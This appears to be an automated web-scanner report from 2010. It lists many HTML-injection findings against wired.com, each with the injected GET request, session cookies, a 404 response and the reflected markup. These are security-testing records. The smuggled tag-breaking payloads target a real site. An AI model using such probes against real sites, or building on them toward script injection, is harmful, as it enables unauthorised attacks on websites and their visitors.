GET /politics/security5f2a3"><a>f519379c247 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29320 Vary: Accept-Encoding Cache-Control: max-age=555 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:09:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_security5f2a3"><a>f519379c247"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da50c"><a>af7f20fae3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceda50c"><a>af7f20fae3a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29259 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:42 GMT Date: Mon, 22 Nov 2010 01:11:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceda50c"><a>af7f20fae3a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb46"><a>7e95b9b5c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science8fb46"><a>7e95b9b5c37/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29260 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Sun, 21 Nov 2010 20:03:06 GMT Date: Sun, 21 Nov 2010 19:59:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science8fb46"><a>7e95b9b5c37"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ddf"><a>cdde2cce323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science96ddf"><a>cdde2cce323/discoveries HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:13:10 GMT Date: Sun, 21 Nov 2010 23:09:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science96ddf"><a>cdde2cce323 ss_discoveries"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38394"><a>ab4904fcd7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries38394"><a>ab4904fcd7d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:35 GMT Date: Sun, 21 Nov 2010 23:09:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries38394"><a>ab4904fcd7d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd1d"><a>538a6317253 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecbd1d"><a>538a6317253/discoveries/news/1999/09/31631 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:55 GMT Date: Sun, 21 Nov 2010 23:12:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecbd1d"><a>538a6317253 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da6c"><a>360db666dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries3da6c"><a>360db666dd0/news/1999/09/31631 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:13 GMT Date: Sun, 21 Nov 2010 23:13:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries3da6c"><a>360db666dd0 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a30c"><a>b820a999ffb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news3a30c"><a>b820a999ffb/1999/09/31631 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:25 GMT Date: Sun, 21 Nov 2010 23:13:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news3a30c"><a>b820a999ffb"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2189"><a>e200d456324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb2189"><a>e200d456324/discoveries/news/2006/04/70701 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:58 GMT Date: Sun, 21 Nov 2010 23:12:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb2189"><a>e200d456324 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fddd"><a>532487198c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries3fddd"><a>532487198c1/news/2006/04/70701 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:18 GMT Date: Sun, 21 Nov 2010 23:13:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries3fddd"><a>532487198c1 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0f"><a>521893294d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news6ba0f"><a>521893294d7/2006/04/70701 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:31 GMT Date: Sun, 21 Nov 2010 23:13:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news6ba0f"><a>521893294d7"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e52a"><a>266a89d6056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science6e52a"><a>266a89d6056/discoveries/news/2007/02/72573 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:10 GMT Date: Sun, 21 Nov 2010 23:10:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science6e52a"><a>266a89d6056 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c3b"><a>4f568f221b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries33c3b"><a>4f568f221b1/news/2007/02/72573 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:36 GMT Date: Sun, 21 Nov 2010 23:10:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries33c3b"><a>4f568f221b1 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ce8"><a>7d46a6a8f6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb4ce8"><a>7d46a6a8f6b/2007/02/72573 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:47 GMT Date: Sun, 21 Nov 2010 23:10:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb4ce8"><a>7d46a6a8f6b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2186"><a>2b24d914e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencef2186"><a>2b24d914e5/discoveries/news/2007/02/72649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:09 GMT Date: Sun, 21 Nov 2010 23:10:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencef2186"><a>2b24d914e5 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be0f"><a>71f4beaefd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7be0f"><a>71f4beaefd6/news/2007/02/72649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:36 GMT Date: Sun, 21 Nov 2010 23:10:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries7be0f"><a>71f4beaefd6 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423ae"><a>3fe3a67e3bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news423ae"><a>3fe3a67e3bd/2007/02/72649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:47 GMT Date: Sun, 21 Nov 2010 23:10:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news423ae"><a>3fe3a67e3bd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9720"><a>e9f4d710ca3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb9720"><a>e9f4d710ca3/discoveries/news/2007/03/72723 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:57 GMT Date: Sun, 21 Nov 2010 23:10:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb9720"><a>e9f4d710ca3 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee3a7"><a>2240bc5bf26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
